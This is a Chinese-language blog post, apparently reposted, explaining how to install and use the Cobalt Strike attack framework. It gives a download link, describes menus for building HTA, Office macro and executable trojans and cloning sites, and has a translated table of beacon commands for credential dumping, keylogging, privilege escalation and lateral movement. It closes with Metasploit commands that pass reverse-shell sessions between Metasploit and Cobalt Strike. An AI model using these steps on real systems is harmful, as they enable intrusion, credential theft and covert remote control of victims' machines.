CobaltStrike的安裝與簡單使用


CobaltStrike的使用

Cobalt Strike 一款以Metasploit為基礎的GUI框架式滲透測試工具,集成了端口轉發、服務掃描,自動化溢出,多模式端口監聽,exe、powershell木馬生成等。但現在已經獨立出來了

1、安裝

網上的資源和安裝還是挺多的,但安全性可能就沒保障了。

鏈接:https://pan.baidu.com/s/1Qc0yEchaY_H-RIM0TsD8tw
提取碼:ha7j

2、啟動

./teamserver ip password #ip和password根據自己需要填寫

./start.sh #另開一個終端輸入

這里需要給這兩個文件足夠的權限

主界面:

搜狗截圖20200628194843

3、基礎功能

(參考:https://www.jianshu.com/p/8d823adbc6b5)

Cobalt Strike

img

New Connection #新的連接(支持連接多個服務器端)
Preferences #偏好設置(設置Cobal Strike界面、控制台、以及輸出報告樣式、TeamServer連接記錄等)
Visualization #窗口視圖模式(展示輸出結果的形式)
VPN Interfaces #VPN接入
Listenrs #監聽器(創建Listener)
Script Manager #腳本管理
Close #關閉

View

img

Applications #應用(顯示受害者機器的應用信息)
Credentials #憑證(通過hashdump或Mimikatz抓取過的密碼都會儲存在這里)
Downloads #下載文件
Event Log #事件日志(主機上線記錄以及團隊協作聊天記錄)
Keystrokes #鍵盤記錄
Proxy Pivots #代理模塊
Screenshots #截圖
Script Console #腳本控制台(可以加載各種腳本,增強功能https://github.com/rsmudge/cortana-scripts)
Targets #顯示目標主機
Web Log #Web日志

Attacks

Packages

img

HTML Application #生成惡意的HTA木馬文件
MS Office Macro #生成office宏病毒文件
Payload Generator #生成各種語言版本的payload
USB/CD AutoPlay #生成利用自動播放運行的木馬文件
Windows Dropper #捆綁器,能夠對文檔類進行捆綁
Windows Executable #生成可執行Payload
Windows Executable(S) #把包含payload,Stageless生成可執行文件(包含多數功能)
Web Drive-by

img

Manage #對開啟的web服務進行管理
Clone Site #克隆網站(可記錄受害者提交的數據)
Host File #提供Web以供下載某文件
Scripted Web Delivery #提供Web服務,便於下載和執行PowerShell Payload,類似於Metasploit的web_delivery 
Signed Applet Attack #啟動一個Web服務以提供自簽名Java Applet的運行環境
Smart Applet Attack #自動檢測Java版本並利用已知的exploits繞過security
System Profiler #用來獲取一些系統信息,比如系統版本,Flash版本,瀏覽器版本等

Reporting

img

0. Activity report #活動報告
1. Hosts report #主機報告
2. Indicators of Compromise #威脅報告
3. Sessions report #會話報告
4. Social engineering report #社會工程學報告
5. Tactics, Techniques, and Procedures #策略、技巧和程序  
Reset Data #重置數據
Export Data #導出數據

Help

img

Homepage #官方主頁
Support #技術支持
Arsenal #開發者
System information #版本信息
About #關於

4、監聽listener

這一步直接設置監聽器即可

5、interact(beacon界面的命令)

beacon> help

Beacon Commands
===============

Command                   Description
-------                   -----------
argue                     進程參數欺騙
blockdlls                 阻止子進程加載非Microsoft DLL
browserpivot              注入受害者瀏覽器進程
bypassuac                 繞過UAC提升權限
cancel                    取消正在進行的下載
cd                        切換目錄
checkin                   強制讓被控端回連一次
clear                     清除beacon內部的任務隊列
connect                   Connect to a Beacon peer over TCP
covertvpn                 部署Covert VPN客戶端
cp                        復制文件
dcsync                    從DC中提取密碼哈希
desktop                   遠程桌面(VNC)
dllinject                 反射DLL注入進程
dllload                   使用LoadLibrary將DLL加載到進程中
download                  下載文件
downloads                 列出正在進行的文件下載
drives                    列出目標盤符
elevate                   使用exp
execute                   在目標上執行程序(無輸出)
execute-assembly          在目標上內存中執行本地.NET程序
exit                      終止beacon會話
getprivs                  Enable system privileges on current token
getsystem                 嘗試獲取SYSTEM權限
getuid                    獲取用戶ID
hashdump                  轉儲密碼哈希值
help                      幫助
inject                    在注入進程生成會話
jobkill                   結束一個后台任務
jobs                      列出后台任務
kerberos_ccache_use       從ccache文件中導入票據應用於此會話
kerberos_ticket_purge     清除當前會話的票據
kerberos_ticket_use       Apply 從ticket文件中導入票據應用於此會話
keylogger                 鍵盤記錄
kill                      結束進程
link                      Connect to a Beacon peer over a named pipe
logonpasswords            使用mimikatz轉儲憑據和哈希值
ls                        列出文件
make_token                創建令牌以傳遞憑據
mimikatz                  運行mimikatz
mkdir                     創建一個目錄
mode dns                  使用DNS A作為通信通道(僅限DNS beacon)
mode dns-txt              使用DNS TXT作為通信通道(僅限D beacon)
mode dns6                 使用DNS AAAA作為通信通道(僅限DNS beacon)
mode http                 使用HTTP作為通信通道
mv                        移動文件
net                       net命令
note                      備注       
portscan                  進行端口掃描
powerpick                 通過Unmanaged PowerShell執行命令
powershell                通過powershell.exe執行命令
powershell-import         導入powershell腳本
ppid                      Set parent PID for spawned post-ex jobs
ps                        顯示進程列表
psexec                    Use a service to spawn a session on a host
psexec_psh                Use PowerShell to spawn a session on a host
psinject                  在特定進程中執行PowerShell命令
pth                       使用Mimikatz進行傳遞哈希
pwd                       當前目錄位置
reg                       Query the registry
rev2self                  恢復原始令牌
rm                        刪除文件或文件夾
rportfwd                  端口轉發
run                       在目標上執行程序(返回輸出)
runas                     以其他用戶權限執行程序
runasadmin                在高權限下執行程序
runu                      Execute a program under another PID
screenshot                屏幕截圖
setenv                    設置環境變量
shell                     執行cmd命令
shinject                  將shellcode注入進程
shspawn                   啟動一個進程並將shellcode注入其中
sleep                     設置睡眠延遲時間
socks                     啟動SOCKS4代理
socks stop                停止SOCKS4
spawn                     Spawn a session 
spawnas                   Spawn a session as another user
spawnto                   Set executable to spawn processes into
spawnu                    Spawn a session under another PID
ssh                       使用ssh連接遠程主機
ssh-key                   使用密鑰連接遠程主機
steal_token               從進程中竊取令牌
timestomp                 將一個文件的時間戳應用到另一個文件
unlink                    Disconnect from parent Beacon
upload                    上傳文件
wdigest                   使用mimikatz轉儲明文憑據
winrm                     使用WinRM橫向滲透
wmi                       使用WMI橫向滲透

6、cobalt strike和msf聯動

msf 派生 shell 給 Cobalt strike(前提有一個meterpreter)

msf exploit(handler) >  use exploit/windows/local/payload_inject
msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 192.168.229.143
msf exploit(payload_inject) > set LPORT 1212
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit

Cobalt strike 派生 shell 給 MSF(前提有個beaconshell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.100
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit

之后使用Cobalt Strike創建一個

windows/foreign/reverse_tcp Listener

其中ip為msf的ip地址,端口為msf所監聽的端口。
然后選中計算機,右鍵->Spawn,選擇剛剛創建的監聽器:
msf中即可看到成功獲取了meterpreter會話


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM